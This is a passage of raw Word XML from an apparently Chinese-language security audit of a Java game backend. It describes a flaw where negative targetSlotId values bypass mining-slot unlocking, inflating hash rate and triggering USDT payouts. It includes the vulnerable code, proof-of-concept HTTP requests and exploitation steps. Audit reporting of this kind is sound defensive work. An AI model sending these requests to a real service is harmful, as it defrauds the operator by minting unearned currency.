        <w:t xml:space="preserve">继续用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>…… 循环将所有存放处矿机激活，无需解锁任何额外坑位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="447"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">系统 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将所有负坑位矿机纳入总算力计算，算力倍增</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若有高等级矿机，可同时触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，获取升级 USDT 奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="449"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期结果：账号总算力等于全部存放处矿机之和，远超游戏限制的坑位数量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户，无需管理员权限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452"/>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MinerService.java.computeBaseTotalHashRate → MinerService.java.getChargeAccelerationRatio</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audit_m152_495_takeFromStorage_ctrl-path1of6.md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：MinerService.java#isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_22" w:id="22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞21：负数 slotId 绕过坑位解锁机制，可无限放置矿机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="453"/>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：负数/零值 targetSlotId 绕过坑位解锁校验，无限扩展算力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="454"/>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src/main/java/com/gameBack/mjservice/service/MinerService.java:isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="455"/>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：业务逻辑绕过 / 经济模型破坏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="456"/>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457"/>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numPr>
          <w:numId w:val="458"/>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isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断前六个坑位无需解锁，但该条件对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>所有非正整数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（0、-1、-2、-100……）同样成立，返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段类型为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，Spring MVC 会接受负整数且不会抛 400。攻击者只需将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为 -1、-2、-3…即可绕过坑位解锁限制，将任意数量的矿机放置到负数"坑位"上，从而：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无需支付任何游戏资源解锁额外坑位；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>所有在负数坑位上的矿机（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）会被 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 全部计入算力；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若新增矿机包含更高等级，会触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，直接增发 USDT 余额。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="462"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（Integer 类型，攻击者可控）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked(userId, targetSlotId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对负数恒为 true → 坑位占用校验通过（每个负数坑位独立唯一）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>miner.setSlotId(targetSlotId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 持久化 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无 slotId 过滤，所有负数坑位矿机全部参与算力计算及等级判断 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 累加算力 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发放 USDT。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="463"/>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464"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每个额外矿机贡献算力，加速游戏内收益；若存储中有高等级矿机，可通过逐步放置到负数坑位多次触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，直接增发 USDT 余额。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>绕过坑位解锁付费机制，损害游戏内经济体系。</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TakeFromStorageForm 字段（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Long minerId;          ← 矿机ID</w:t>
              <w:br/>
              <w:t>//   Integer targetSlotId;  ← 目标坑位（可传负整数，Spring MVC 接受）</w:t>
              <w:br/>
              <w:br/>
              <w:t>@PostMapping("/takeFromStorage")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; takeFromStorage(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @CurrentUserId Long userId,                    // ← 网关注入，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestBody TakeFromStorageForm form) {       // ← HTTP 可控入口，targetSlotId 攻击者完全控制</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.takeFromStorage(userId, form.getMinerId(), form.getTargetSlotId())); // ← 污点传入 service</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service：MinerService.java#takeFromStorage</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner takeFromStorage(Long userId, Long minerId, Integer targetSlotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, targetSlotId)) { // ← targetSlotId 传入校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位未解锁");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, targetSlotId, 0).isPresent()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位已被占用"); // ← 仅防同一坑位重复，不防多个负数坑位</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(targetSlotId); // ← 负数 slotId 写入数据库</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId); // ← 所有 inStorage=0 矿机参与计算，包括负数 slotId</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞核心：MinerService.java#isSlotUnlocked</w:t>
              <w:br/>
              <w:t>public boolean isSlotUnlocked(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (slotId &lt;= 6) return true; // ← 漏洞点：-1、-2、-100 等负整数均满足此条件，直接返回 true</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userSlotUnlockRepository.findByUserIdAndSlotId(userId, slotId)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            .map(u -&gt; u.getIsU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nlocked() != null &amp;&amp; u.getIsUnlocked() == 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElse(false);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 算力计算：MinerService.java#computeBaseTotalHashRate（污点流向）</w:t>
              <w:br/>
              <w:t>public BigDecimal computeBaseTotalHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0); // ← 无 slotId 过滤，负数坑位矿机全部纳入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miners.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(m -&gt; { ... return base; })     // ← 每台矿机（含负数坑位）贡献算力</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .reduce(BigDecimal.ZERO, BigDecimal::add);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ⑤ USDT 发放：MinerService.java#grantUsdtOnLevelUp（资金影响）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// 若新放入的矿机等级高于 currentLevel，将触发按等级增发 USDT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第一步：将矿机放入 slotId = -1（绕过解锁限制）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&lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;valid_user_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_sign&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "minerId": &lt;矿机ID_1_在存放处&gt;,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "targetSlotId": -1</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第二步：再放一台矿机到 slotId = -2</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w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "minerId": &lt;矿机ID_2_在存放处&gt;,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "targetSlotId": -2</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第三步：以此类推，每次递减 targetSlotId（-3、-4……），可将存放处所有矿机全部"放置"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="466"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>正常登录获取有效 Bearer token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>购买或获取多台矿机，使其处于存放处（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="468"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>按上述 POC 批量发送请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
